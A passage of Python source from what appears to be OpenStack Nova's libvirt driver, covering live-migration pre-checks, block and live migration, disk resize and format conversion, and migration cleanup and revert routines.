:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * units.Ki) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"image_type": CONF.libvirt.images_type,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
dest_check_data.update({'is_shared_block_storage':
self._is_shared_block_storage(instance, dest_check_data)})
dest_check_data.update({'is_shared_instance_path':
self._is_shared_instance_path(dest_check_data)})
if dest_check_data['block_migration']:
if (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _is_shared_block_storage(self, instance, dest_check_data):
"""Check if all block storage of an instance can be shared
between source and destination of a live migration.
Returns true if the instance is volume backed and has no local disks,
or if the image backend is the same on source and destination and the
backend shares block storage between compute nodes.
"""
if (CONF.libvirt.images_type == dest_check_data.get('image_type') and
self.image_backend.backend().is_shared_block_storage()):
return True
if (dest_check_data.get('is_volume_backed') and
not bool(jsonutils.loads(
self.get_instance_disk_info(instance['name'])))):
# pylint: disable=E1120
return True
return False
def _is_shared_instance_path(self, dest_check_data):
"""Check if instance path is shared between source and
destination of a live migration.
"""
return self._check_shared_storage_test_file(
dest_check_data["filename"])
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports the qcow2 disk format, which is usually compressed
# on compute nodes.
# The real (compressed) disk image may be enlarged up to the
# "virtual disk size", which is the maximum disk size specified for
# the image (see qemu-img info on the disk path).
# The scheduler considers the destination host to still have enough
# disk space if real disk size < available disk size
# when disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * units.Mi
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
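# Worked example with illustrative numbers: available_mb = 10240 gives
# available = 10 GiB; two qcow2 disks with virt_disk_size of 8 GiB and
# 4 GiB and disk_over_commit=False give necessary = 12 GiB, so
# available - necessary < 0 and MigrationPreCheckError is raised.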
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string of cpu feature from _get_cpu_info()
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt.virt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_LI('Instance launched has CPU info: %s'), cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# if an unknown character exists in the xml, libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.", tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Returns False if the tmpfile cannot be confirmed.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance.name)
greenthread.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _correct_listen_addr(self, old_xml_str, listen_addrs):
# NB(sross): can't just use LibvirtConfigGuest#parse_str
# here b/c it doesn't capture the entire XML
# description
xml_doc = etree.fromstring(old_xml_str)
# change over listen addresses
for dev in xml_doc.findall('./devices/graphics'):
gr_type = dev.get('type')
listen_tag = dev.find('listen')
if gr_type in ('vnc', 'spice'):
if listen_tag is not None:
listen_tag.set('address', listen_addrs[gr_type])
if dev.get('listen') is not None:
dev.set('listen', listen_addrs[gr_type])
return etree.tostring(xml_doc)
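# Assumed example of the rewrite above: a device such as
# <graphics type='vnc' listen='0.0.0.0'><listen type='address'
#   address='0.0.0.0'/></graphics>
# with listen_addrs = {'vnc': '192.0.2.10', 'spice': '192.0.2.10'} has both
# the child <listen> address and the 'listen' attribute set to 192.0.2.10.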
def _check_graphics_addresses_can_live_migrate(self, listen_addrs):
LOCAL_ADDRS = ('0.0.0.0', '127.0.0.1', '::', '::1')
local_vnc = CONF.vncserver_listen in LOCAL_ADDRS
local_spice = CONF.spice.server_listen in LOCAL_ADDRS
if ((CONF.vnc_enabled and not local_vnc) or
(CONF.spice.enabled and not local_spice)):
raise exception.MigrationError(
_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag or your'
' destination node does not support'
' retrieving listen addresses. In order'
' for live migration to work properly, you'
' must configure the graphics (VNC and/or'
' SPICE) listen addresses to be either'
' the catch-all address (0.0.0.0 or ::) or'
' the local address (127.0.0.1 or ::1).'))
if listen_addrs is not None:
dest_local_vnc = listen_addrs['vnc'] in LOCAL_ADDRS
dest_local_spice = listen_addrs['spice'] in LOCAL_ADDRS
if ((CONF.vnc_enabled and not dest_local_vnc) or
(CONF.spice.enabled and not dest_local_spice)):
LOG.warn(_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag, and the '
' graphics (VNC and/or SPICE) listen'
' addresses on the destination node do not'
' match the addresses on the source node.'
' Since the source node has listen'
' addresses set to either the catch-all'
' address (0.0.0.0 or ::) or the local'
' address (127.0.0.1 or ::1), the live'
' migration will succeed, but the VM will'
' continue to listen on the current'
' addresses.'))
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.libvirt.block_migration_flag.split(',')
else:
flaglist = CONF.libvirt.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
pre_live_migrate_data = (migrate_data or {}).get(
'pre_live_migration_result', {})
listen_addrs = pre_live_migrate_data.get('graphics_listen_addrs')
migratable_flag = getattr(libvirt, 'VIR_DOMAIN_XML_MIGRATABLE',
None)
if migratable_flag is None or listen_addrs is None:
self._check_graphics_addresses_can_live_migrate(listen_addrs)
dom.migrateToURI(CONF.libvirt.live_migration_uri % dest,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
else:
old_xml_str = dom.XMLDesc(migratable_flag)
new_xml_str = self._correct_listen_addr(old_xml_str,
listen_addrs)
dom.migrateToURI2(CONF.libvirt.live_migration_uri % dest,
None,
new_xml_str,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_block_storage = True
is_shared_instance_path = True
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', True)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', True)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_instance_path:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if not is_shared_block_storage:
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance,
instance_dir, disk_info)
if not (is_block_migration or is_shared_instance_path):
# NOTE(angdraug): when block storage is shared between source and
# destination and instance path isn't (e.g. volume backed or rbd
# backed instance), instance path on destination has to be prepared
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
self._connect_volume(connection_info, disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retrying is necessary because requests arrive continuously;
# concurrent requests to iptables cause it to complain.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_LW('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
res_data = {'graphics_listen_addrs': {}}
res_data['graphics_listen_addrs']['vnc'] = CONF.vncserver_listen
res_data['graphics_listen_addrs']['spice'] = CONF.spice.server_listen
return res_data
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
""":param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:param disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['virt_disk_size'])
elif info['backing_file']:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt.images_type)
if cache_name.startswith('ephemeral'):
image.cache(fetch_func=self._create_ephemeral,
fs_label=cache_name,
os_type=instance["os_type"],
filename=cache_name,
size=info['virt_disk_size'],
ephemeral_size=instance['ephemeral_gb'])
elif cache_name.startswith('swap'):
inst_type = flavors.extract_flavor(instance)
swap_mb = inst_type['swap']
image.cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=swap_mb * units.Mi,
swap_mb=swap_mb)
else:
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
def post_live_migration_at_source(self, context, instance, network_info):
"""Unplug VIFs from networks at source.
:param context: security context
:param instance: instance object reference
:param network_info: instance network information
"""
self.unplug_vifs(instance, network_info)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration=False,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(
CONF.libvirt.virt_type, instance, block_device_info)
xml = self._get_guest_xml(context, instance,
network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._conn.defineXML(xml)
def _get_instance_disk_info(self, instance_name, xml,
block_device_info=None):
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug('skipping disk for %s as it does not have a path',
instance_name)
continue
if disk_type != 'file':
LOG.debug('skipping %s since it looks like volume', path)
continue
if target in volume_devices:
LOG.debug('skipping disk %(path)s (%(target)s) as it is a '
'volume', {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = dk_size
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
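# Illustrative entry in the JSON returned above (paths and sizes are
# made up): a qcow2 root disk occupying 2 GiB on disk with a 20 GiB
# virtual size yields {'type': 'qcow2', 'path': '.../disk',
# 'virt_disk_size': 21474836480, 'backing_file': '<base image>',
# 'disk_size': 2147483648, 'over_committed_disk_size': 19327352832}.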
def get_instance_disk_info(self, instance_name,
block_device_info=None):
try:
dom = self._lookup_by_name(instance_name)
xml = dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
return self._get_instance_disk_info(instance_name, xml,
block_device_info)
def _get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instances use : virtual_size - disk_size
disk_over_committed_size = 0
for dom in self._list_instance_domains():
try:
xml = dom.XMLDesc(0)
disk_infos = jsonutils.loads(
self._get_instance_disk_info(dom.name(), xml))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
LOG.warn(_LW(
'Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] %(ex)s'
) % {'instance_name': dom.name(),
'error_code': error_code,
'ex': ex})
except OSError as e:
if e.errno == errno.ENOENT:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but disk file was removed by concurrent '
'operations such as resize.'),
{'i_name': dom.name()})
elif e.errno == errno.EACCES:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but access is denied. It is most likely '
'due to a VM that exists on the compute '
'node but is not managed by Nova.'),
{'i_name': dom.name()})
else:
raise
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_cpu_stats(self):
"""Return the current CPU state of the host."""
# Extract node's CPU statistics.
stats = self._conn.getCPUStats(libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._conn.getInfo()[3]
return stats
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
# NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.update(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
LOG.debug("Starting migrate_disk_and_power_off",
instance=instance)
# Checks if the migration needs a disk resize down.
for kind in ('root_gb', 'ephemeral_gb'):
if flavor[kind] < instance[kind]:
reason = _("Unable to resize disk down.")
raise exception.InstanceFaultRollback(
exception.ResizeError(reason=reason))
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# NOTE(dgenin): Migration is not implemented for LVM backed instances.
if (CONF.libvirt.images_type == 'lvm' and
not self._is_booted_from_volume(instance, disk_info_text)):
reason = "Migration is not supported for LVM backed instances"
raise exception.MigrationPreCheckError(reason)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance, timeout, retry_interval)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
active_flavor = flavors.extract_flavor(instance)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if (fname == 'disk.swap' and
active_flavor.get('swap', 0) != flavor.get('swap', 0)):
# To properly resize the swap partition, it must be
# re-created with the proper size. This is acceptable
# because when an OS is shut down, the contents of the
# swap space are just garbage, the OS doesn't bother about
# what is in it.
# We will not copy over the swap disk here, and rely on
# finish_migration/_create_image to re-create it for us.
continue
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
@staticmethod
def _disk_size_from_instance(instance, info):
"""Determines the disk size from instance properties
Returns the disk size by using the disk name to determine whether it
is a root or an ephemeral disk, then by checking properties of the
instance returns the size converted to bytes.
Returns 0 if the disk name does not match (disk, disk.local).
"""
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
return size * units.Gi
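# Worked example: for a file named 'disk' on an instance with
# root_gb = 20 this returns 20 * units.Gi = 21474836480 bytes;
# 'disk.local' uses ephemeral_gb, and any other name (e.g. 'disk.swap')
# returns 0.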
@staticmethod
def _disk_raw_to_qcow2(path):
"""Converts a raw disk to qcow2."""
path_qcow = path + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', path, path_qcow)
utils.execute('mv', path_qcow, path)
@staticmethod
def _disk_qcow2_to_raw(path):
"""Converts a qcow2 disk to raw."""
path_raw = path + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', path, path_raw)
utils.execute('mv', path_raw, path)
def _disk_resize(self, info, size):
"""Attempts to resize a disk to size
Attempts to resize a disk by checking the capabilities and
preparing the format, then calling disk.api.extend.
Note: Currently only disk extension is supported.
"""
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt, org = [info['type']] * 2
pth = info['path']
if (size and fmt == 'qcow2' and
disk.can_resize_image(pth, size) and
disk.is_image_partitionless(pth, use_cow=True)):
self._disk_qcow2_to_raw(pth)
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(pth, size, use_cow=use_cow)
if fmt != org:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
self._disk_raw_to_qcow2(pth)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_migration", instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
size = self._disk_size_from_instance(instance, info)
if resize_instance:
self._disk_resize(info, size)
if info['type'] == 'raw' and CONF.use_cow_images:
self._disk_raw_to_qcow2(info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# assume _create_image does nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug("Starting finish_revert_migration",
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
@staticmethod
def _get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
def get_diagnostics(self, instance):
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
